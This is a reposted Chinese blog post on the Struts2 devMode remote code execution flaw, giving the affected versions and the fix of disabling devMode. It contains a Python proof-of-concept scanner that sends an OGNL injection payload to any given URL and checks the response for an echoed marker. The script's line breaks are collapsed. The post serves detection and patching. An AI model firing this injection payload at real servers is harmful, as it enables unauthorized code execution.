博客
关于我
Struts2 devMode远程代码执行漏洞检测利用
阅读量:179 次
发布时间:2019-02-28

本文共 1744 字,大约阅读时间需要 5 分钟。

Apache Struts 2是世界上最流行的Java Web服务器框架之一,当Struts2开启devMode模式时,将导致严重远程代码执行漏洞。如果WebService 启动权限为最高权限时,可远程执行任意命令,包括关机、建立新用户、以及删除服务器上所有文件等等。

什么是devMode?

所谓的devMode模式,看名称也知道,是为Struts2开发人员调试程序准备的,在此模式下可以方便地查看日志等信息。默认情况下,devMode模式是关闭的。不过实际上仍然有很多网站上线的时候就赤裸裸地采用devMode模式,自然面临更大的安全问题,需要尽快修复。

影响范围:

当Struts开启devMode时,该漏洞将影响Struts 2.1.0–2.5.1,通杀Struts2所有版本。

漏洞检测

POC:

#!/usr/bin/env python#coding:utf-8 -*-import sysimport getoptimport urllib import urllib2poc = "debug=command&expression=(%23wr%3D%23context%5B%23parameters.obj%5B0%5D%5D.getWriter())!%3D(%23wr.println(%23parameters.content%5B0%5D))!%3D(%23wr.flush())!%3D(%23wr.close())&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=Adlabgsrc"banner = '''# S2-devMode 检测工具#修复建议 : 关闭devMode模式#使用说明: 检测命令 python s2-devmode.py -u http://localhost:8080/orders/3/xxx/    例如 python s2-adlab.py -u http://223.22.22.22:8080/example/HelloWorld.action帮助信息 python s2-devmode.py -h  '''def usage():	print bannerdef send_poc(geturl,data):	try:		user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)' 		headers = { 'User-Agent' : user_agent,				'Cookie'	: ""} 		req = urllib2.Request(geturl+"?"+data, headers=headers) 		response = urllib2.urlopen(req) 		content = response.read()		if  "Adlabgsrc" in content:			print "该网站存在s2-devmode代码执行漏洞,请及时修复"			return True		else:			print "该网站安全"			return False		except urllib2.URLError, e:		#print e.reason		pass	return False	def check_vul(url):	if url.find("http://") | url.find("https://"):								send_poc(url,poc)						if __name__ == '__main__':	opts, args = getopt.getopt(sys.argv[1:], "hu:o:")	for op, value in opts:		if op == "-u":			target_url = value				check_vul(target_url)		elif op == "-h":			usage()

工具检测

下载地址:

修复方案:

关闭devMode:在struts.xml 设置

转载地址:http://gegc.baihongyu.com/

你可能感兴趣的文章
NIO基于UDP协议的网络编程
查看>>
NIO笔记---上
查看>>
NIO蔚来 面试——IP地址你了解多少?
查看>>
NISP一级,NISP二级报考说明,零基础入门到精通,收藏这篇就够了
查看>>
NISP国家信息安全水平考试,收藏这一篇就够了
查看>>
NIS服务器的配置过程
查看>>
NIS认证管理域中的用户
查看>>
Nitrux 3.8 发布!性能全面提升,带来非凡体验
查看>>
NiuShop开源商城系统 SQL注入漏洞复现
查看>>
NI笔试——大数加法
查看>>
NLog 自定义字段 写入 oracle
查看>>
NLog类库使用探索——详解配置
查看>>
NLP 基于kashgari和BERT实现中文命名实体识别(NER)
查看>>
NLP 模型中的偏差和公平性检测
查看>>
Vue3.0 性能提升主要是通过哪几方面体现的?
查看>>
NLP 项目:维基百科文章爬虫和分类【01】 - 语料库阅读器
查看>>
NLP_什么是统计语言模型_条件概率的链式法则_n元统计语言模型_马尔科夫链_数据稀疏(出现了词库中没有的词)_统计语言模型的平滑策略---人工智能工作笔记0035
查看>>
NLP三大特征抽取器:CNN、RNN与Transformer全面解析
查看>>
NLP学习笔记:使用 Python 进行NLTK
查看>>
NLP度量指标BELU真的完美么?
查看>>